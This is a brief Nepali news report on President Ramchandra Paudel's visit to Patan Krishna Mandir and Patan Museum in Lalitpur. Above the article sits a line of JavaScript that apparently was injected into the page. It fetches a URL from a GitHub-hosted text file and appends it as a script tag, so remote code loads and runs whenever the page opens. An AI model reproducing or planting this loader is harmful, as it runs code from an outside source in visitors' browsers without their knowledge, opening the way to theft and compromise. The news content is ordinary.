;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
१२ साउन, काठमाडौं ।
राष्ट्रपति रामचन्द्र पौडेलले ललितपुरको पाटन कृष्ण मन्दिरको दर्शन गरेका छन् । साथै उनले पाटन संग्रहालय पनि अवलोकन गरे ।राष्ट्रपति पौडेल आज बिहान पाटन दरबार क्षेत्रमा पुग्दा ललितपुर महानगरपालिकाका प्रमुख चिरीबाबु महर्जनले स्वागत गरेका थिए ।
पाटन संग्रहालयका निमित्त कार्यकारी निर्देशक सुरेश लाखे र स्मारक संरक्षण तथा दरबार हेरचाह कार्यालयका निमित्त प्रमुख शारदा शिवाकोटीले सो क्षेत्रको जानकारी गराएको राष्ट्रपतिका प्रेस सल्लाहका किरण पोखरेलले जानकारी दिए ।
फेसबुक प्रतिक्रियाहरु